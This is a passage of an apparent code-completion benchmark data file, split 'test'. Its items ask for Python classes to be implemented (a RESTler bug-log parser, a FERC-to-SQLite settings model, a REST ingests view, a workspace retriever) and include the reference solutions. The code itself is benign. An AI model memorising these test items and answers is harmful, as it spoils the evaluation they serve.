Str\n- def diff_log(self, other): Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\n- def _parse(self): Parses the bug log to populate the bug list @return: None @rtype : None", "prompted_full_text": "Implement the Python class `BugLogParser` described below.\n\nClass description:\nResponsible for parsing bug bucket logs\n\nMethod signatures and docstrings:\n- def __init__(self, path): BugLogParser constructor @param path: The path to the bug log file @type path: Str\n- def diff_log(self, other): Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\n- def _parse(self): Parses the bug log to populate the bug list @return: None @rtype : None\n\n<|skeleton|>\nclass BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n <|body_0|>\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n <|body_1|>\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n<|end_body_0|>\n\n<|body_start_1|>\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, 
reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n<|end_body_2|>\n", "revision_id": "5a9ba1af74953334fcf54570f1e31e74ea057688", "skeleton": "<|skeleton|>\nclass BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n <|body_0|>\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n <|body_1|>\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. 
Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n", "source": "the_stack_v2_python_sparse", "source_path": "restler/test_servers/log_parser.py", "source_repo": "wisec/restler-fuzzer", "split": "test", "star_events_count": 0} {"blob_id": "79c6fd96ee3fa40e17e393494783294e2869252f", "bodies": ["if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\nreturn values", "match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\nreturn settings"], "bodies_text": "<|body_start_0|>\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n<|end_body_0|>\n\n<|body_start_1|>\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n<|end_body_1|>\n", "class_docstring": "An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.", "class_name": "FercToSqliteSettings", "detected_licenses": ["CC-BY-4.0", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. 
other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n <|body_0|>\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n<|end_body_0|>\n\n<|body_start_1|>\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000389", "length_bytes": 24804, "license_type": "permissive", "methods": [{"docstring": "If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.", "name": "default_load_all", "signature": "def default_load_all(cls, values)"}, {"docstring": "Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.", "name": "get_xbrl_dataset_settings", "signature": "def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002317", "prompt": "Implement the Python class `FercToSqliteSettings` described below.\n\nClass description:\nAn immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\n\nMethod signatures and docstrings:\n- def default_load_all(cls, values): If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\n- def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings: Return a list with all requested FERC XBRL to SQLite datasets. 
Args: form_number: Get settings by FERC form number.", "prompted_full_text": "Implement the Python class `FercToSqliteSettings` described below.\n\nClass description:\nAn immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\n\nMethod signatures and docstrings:\n- def default_load_all(cls, values): If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\n- def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings: Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\n\n<|skeleton|>\nclass FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n <|body_0|>\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n<|end_body_0|>\n\n<|body_start_1|>\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n<|end_body_1|>\n", "revision_id": "6afae8aade053408f23ac4332d5cbb438ab72dc6", "skeleton": "<|skeleton|>\nclass FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. 
Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n <|body_0|>\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. Args: form_number: Get settings by FERC form number.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FercToSqliteSettings:\n \"\"\"An immutable pydantic model to validate FERC XBRL to SQLite settings. Args: ferc1_dbf_to_sqlite_settings: Settings for converting FERC 1 DBF data to SQLite. ferc1_xbrl_to_sqlite_settings: Settings for converting FERC 1 XBRL data to SQLite. other_xbrl_forms: List of non-FERC1 forms to convert from XBRL to SQLite.\"\"\"\n\n def default_load_all(cls, values):\n \"\"\"If no datasets are specified default to all. Args: values (Dict[str, BaseModel]): dataset settings. Returns: values (Dict[str, BaseModel]): dataset settings.\"\"\"\n if not any(values.values()):\n values['ferc1_dbf_to_sqlite_settings'] = Ferc1DbfToSqliteSettings()\n values['ferc1_xbrl_to_sqlite_settings'] = Ferc1XbrlToSqliteSettings()\n values['ferc2_dbf_to_sqlite_settings'] = Ferc2DbfToSqliteSettings()\n values['ferc2_xbrl_to_sqlite_settings'] = Ferc2XbrlToSqliteSettings()\n values['ferc6_dbf_to_sqlite_settings'] = Ferc6DbfToSqliteSettings()\n values['ferc6_xbrl_to_sqlite_settings'] = Ferc6XbrlToSqliteSettings()\n values['ferc60_dbf_to_sqlite_settings'] = Ferc60DbfToSqliteSettings()\n values['ferc60_xbrl_to_sqlite_settings'] = Ferc60XbrlToSqliteSettings()\n values['ferc714_xbrl_to_sqlite_settings'] = Ferc714XbrlToSqliteSettings()\n return values\n\n def get_xbrl_dataset_settings(self, form_number: XbrlFormNumber) -> FercGenericXbrlToSqliteSettings:\n \"\"\"Return a list with all requested FERC XBRL to SQLite datasets. 
Args: form_number: Get settings by FERC form number.\"\"\"\n match form_number:\n case XbrlFormNumber.FORM1:\n settings = self.ferc1_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM2:\n settings = self.ferc2_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM6:\n settings = self.ferc6_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM60:\n settings = self.ferc60_xbrl_to_sqlite_settings\n case XbrlFormNumber.FORM714:\n settings = self.ferc714_xbrl_to_sqlite_settings\n return settings\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pudl/settings.py", "source_repo": "catalyst-cooperative/pudl", "split": "test", "star_events_count": 382} {"blob_id": "09ceeff88db61da4ecf6a84878bedc5302bdf39a", "bodies": ["if self.request.version == 'v6':\n return IngestSerializerV6\nelif self.request.version == 'v7':\n return IngestSerializerV6", "if request.version == 'v6':\n return self.list_impl(request)\nelif request.version == 'v7':\n return self.list_impl(request)\nraise Http404()", "started = rest_util.parse_timestamp(request, 'started', required=False)\nended = rest_util.parse_timestamp(request, 'ended', required=False)\nrest_util.check_time_range(started, ended)\ningest_statuses = rest_util.parse_string_list(request, 'status', required=False)\nstrike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\nscan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\nfile_name = rest_util.parse_string(request, 'file_name', required=False)\norder = rest_util.parse_string_list(request, 'order', required=False)\ningests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\npage = self.paginate_queryset(ingests)\nserializer = self.get_serializer(page, many=True)\nreturn self.get_paginated_response(serializer.data)"], "bodies_text": "<|body_start_0|>\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n<|end_body_0|>\n\n<|body_start_1|>\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n<|end_body_1|>\n\n<|body_start_2|>\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n<|end_body_2|>\n", "class_docstring": "This view is the endpoint for retrieving the list of all ingests.", "class_name": "IngestsView", "detected_licenses": ["LicenseRef-scancode-free-unknown", "Apache-2.0", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IngestsView:\n \"\"\"This view is the endpoint for retrieving the list 
of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n <|body_0|>\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_1|>\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n<|end_body_0|>\n\n<|body_start_1|>\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n<|end_body_1|>\n\n<|body_start_2|>\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000390", "length_bytes": 30689, "license_type": "permissive", "methods": [{"docstring": "Returns the appropriate serializer based off the requests version of the REST API", "name": "get_serializer_class", "signature": "def get_serializer_class(self)"}, {"docstring": "Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user", "name": "list", "signature": "def list(self, request)"}, {"docstring": "Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user", "name": "list_impl", "signature": "def list_impl(self, request)"}], "n_methods": 3, "prompt": "Implement the Python class `IngestsView` described below.\n\nClass description:\nThis view is the endpoint for retrieving the list of all ingests.\n\nMethod signatures and docstrings:\n- def get_serializer_class(self): Returns the appropriate serializer based off the requests version of the REST API\n- def list(self, request): Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: 
:class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\n- def list_impl(self, request): Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user", "prompted_full_text": "Implement the Python class `IngestsView` described below.\n\nClass description:\nThis view is the endpoint for retrieving the list of all ingests.\n\nMethod signatures and docstrings:\n- def get_serializer_class(self): Returns the appropriate serializer based off the requests version of the REST API\n- def list(self, request): Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\n- def list_impl(self, request): Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\n\n<|skeleton|>\nclass IngestsView:\n \"\"\"This view is the endpoint for retrieving the list of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n <|body_0|>\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_1|>\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n<|end_body_0|>\n\n<|body_start_1|>\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n<|end_body_1|>\n\n<|body_start_2|>\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n<|end_body_2|>\n", "revision_id": "28618aee07ceed9e4a6eb7b8d0e6f05b31d8fd6b", "skeleton": "<|skeleton|>\nclass IngestsView:\n 
\"\"\"This view is the endpoint for retrieving the list of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n <|body_0|>\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_1|>\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IngestsView:\n \"\"\"This view is the endpoint for retrieving the list of all ingests.\"\"\"\n\n def get_serializer_class(self):\n \"\"\"Returns the appropriate serializer based off the requests version of the REST API\"\"\"\n if self.request.version == 'v6':\n return IngestSerializerV6\n elif self.request.version == 'v7':\n return IngestSerializerV6\n\n def list(self, request):\n \"\"\"Determine api version and call specific method :param request: the HTTP POST request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n if request.version == 'v6':\n return self.list_impl(request)\n elif request.version == 'v7':\n return self.list_impl(request)\n raise Http404()\n\n def list_impl(self, request):\n \"\"\"Retrieves the list of all ingests and returns it in JSON form :param request: the HTTP GET request :type request: :class:`rest_framework.request.Request` :rtype: :class:`rest_framework.response.Response` :returns: the HTTP response to send back to the user\"\"\"\n started = rest_util.parse_timestamp(request, 'started', required=False)\n ended = rest_util.parse_timestamp(request, 'ended', required=False)\n rest_util.check_time_range(started, ended)\n ingest_statuses = rest_util.parse_string_list(request, 'status', required=False)\n strike_ids = rest_util.parse_int_list(request, 'strike_id', required=False)\n scan_ids = rest_util.parse_int_list(request, 'scan_id', required=False)\n file_name = rest_util.parse_string(request, 'file_name', required=False)\n order = rest_util.parse_string_list(request, 'order', required=False)\n ingests = Ingest.objects.get_ingests(started=started, ended=ended, statuses=ingest_statuses, scan_ids=scan_ids, strike_ids=strike_ids, file_name=file_name, order=order)\n page = self.paginate_queryset(ingests)\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "scale/ingest/views.py", "source_repo": "kfconsultant/scale", "split": "test", "star_events_count": 0} {"blob_id": "df6f751988b8704fcd4c3eab5d4c82cfc2f0f6a3", "bodies": ["self.app_domain = kwargs.get('app_domain')\nself.session_key = kwargs.get('session_key')\nself.user = kwargs.get('user')\nself.data_source_type_id = kwargs.get('data_source_type_id')\nself.workspace_id = kwargs.get('workspace_id')", "success, user_or_err = get_authenticated_user(request)\nif not success:\n return (False, user_or_err)\nreturn 
WorkspaceRetriever.list_workspaces_by_user(user_or_err, as_dict, **kwargs)", "if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\nsession_key = kwargs.get(KW_SESSION_KEY, None)\nws_list = workspace_queryset_base().filter(user=auth_user)\nif not as_dict:\n return (True, ws_list)\nfmt_list = []\nfor workspace in ws_list:\n ws_dict = workspace.as_dict_lite()\n ws_dict['is_current_session'] = bool(session_key and session_key == workspace.session_key)\n fmt_list.append(ws_dict)\nreturn (True, fmt_list)", "if ws_id is None:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\nif request is None:\n return (False, ERR_REQUEST_OBJ_IS_NONE)\nsuccess, user_or_err = get_authenticated_user(request)\nif not success:\n return (False, user_or_err)\nreturn WorkspaceRetriever.get_by_user_and_id(user_or_err, ws_id, as_dict)", "if not auth_user:\n return (False, ERR_AUTH_USER_IS_NONE)\nif not ws_id:\n return (False, ERR_WORKSPACE_ID_IS_NONE)\nqparams = dict(id=ws_id)\nif auth_user.is_active and auth_user.is_superuser:\n workspace = workspace_queryset_base().filter(**qparams).first()\nelse:\n qparams['user'] = auth_user\n workspace = workspace_queryset_base().filter(**qparams).first()\nif workspace:\n if as_dict:\n return (True, workspace.as_dict())\n return (True, workspace)\nreturn (False, 'Workspace not found with user: [%s] and id: [%s]' % (auth_user, ws_id))"], "bodies_text": "<|body_start_0|>\n self.app_domain = kwargs.get('app_domain')\n self.session_key = kwargs.get('session_key')\n self.user = kwargs.get('user')\n self.data_source_type_id = 